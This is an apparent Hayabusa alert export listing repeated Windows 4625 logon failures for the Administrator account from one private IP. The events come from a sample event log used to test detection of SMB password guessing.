2016-09-20 01:52:44.740 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QGMPHNpljTlMYeet  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.794 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pWo4uVFtAbe4IjKC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YAPdDqbMY4rYiuZ3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ai2WCQ3MkWwSeOy9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.946 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ey1wbsD7w3fs02xP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.983 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sVGzidwZICNfLizg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.029 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8zjGPMJ6RBw48Ejx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.071 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MydK8AjPvyyckCEL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.105 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4fqkCliAQMiFffQU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ITkku4kN4csBFyUB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.197 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: f5g9kMkSFhKrT2Py  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1xKLdwujTmLEc9ts  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sAW1YzCQ3CreseaP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.326 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vhqBirEHOKPepR3n  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.376 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5uqSFXpzAWOnc90n  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: McbeS9lRpbMc48jO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.477 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: I6J0d7dQUmJNKJlu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QG3WU91rhTP9odx7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.579 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hSQRgB8yMfhb03g1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.614 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bzbZjRXTc0XvV4Ry  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.665 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: k3ShOCSaLGX4YBWE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lIrydzi8nmY251Z1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: h4vlRksTGxAqEt9j  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uJMnD0foEDbcNfTj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.829 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HNWppBJLFojEFtiF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: t7a9Tvr6ruDpiG2T  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NBNIizCKz2ybc3eM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.961 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YwuXQhISpgfSFqZ9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.011 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yeONLdrrauxqvgaT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.058 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RFqSH4toadsTideV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.104 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HuMa0Juj1tjL6NDY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.145 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UA8zU0kJ6gAFqSaF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jvX85gF8wk3AGJyb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OpzOMKQIBrkQW5Os  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cqzrLAqHNi4CHT56  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.326 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HWMap8qHlykO6Yeu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pkc9LWakJBjhBQv6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: y43cE75gTzA1XjHF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9HopaYDAbYxHjJEr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: brNgudTWJaKs8nLd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MzPwOqU92kdGodBH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IXlzxK5OXL9hpqrZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2cLdgWvrVh7h2jPk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.717 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: h34xlYavVsXQRCYG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6wjflwqXyFzYTi0b  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MlsuCSajqGUYTBWL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xQDdrQQZ5xYBDiRi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.872 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JX5NMuwUsOZEp3zh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JfrbGLqKGru8AE2a  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.961 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 813natbodi6QauRW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KpfKxOZG3xSr5Yqm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fErWiEb0USDghXsB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fOWF6YnW8UEPlw41  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SNPXuHduatLFQc8W  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.157 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 35rfur4MzKzwxCIn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.201 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VmAqzaZaeoSjcuh5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lKuCpuGcGmDOoewr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.281 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Bz6SOAeTyqsBz6Oa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.317 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CSURiEoC7dw0w0ru  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bDjwkaHT8lrFmn9X  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ayI129HgVWA5q4Sk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jT2yiuOJS8Fvf9SD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.495 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1hpAO2UrjFd6Kxt0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.537 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZkgGj9Fnqn3XwnBT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WFXPYo0yzR7p8dNU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9j6MxN7PuM29Vlcq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: w1CWIqoV6GzmmlRm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uiBfvnfTcIG4xJoi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.741 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dED7HYntoE5D7XvG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.781 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pX1ztnCKiePrPbTT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: u3XQcfMHJDsBtJDy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.864 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MhRsRIS5tHKLv2oL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.917 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JmkLhptugDU2fDWp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
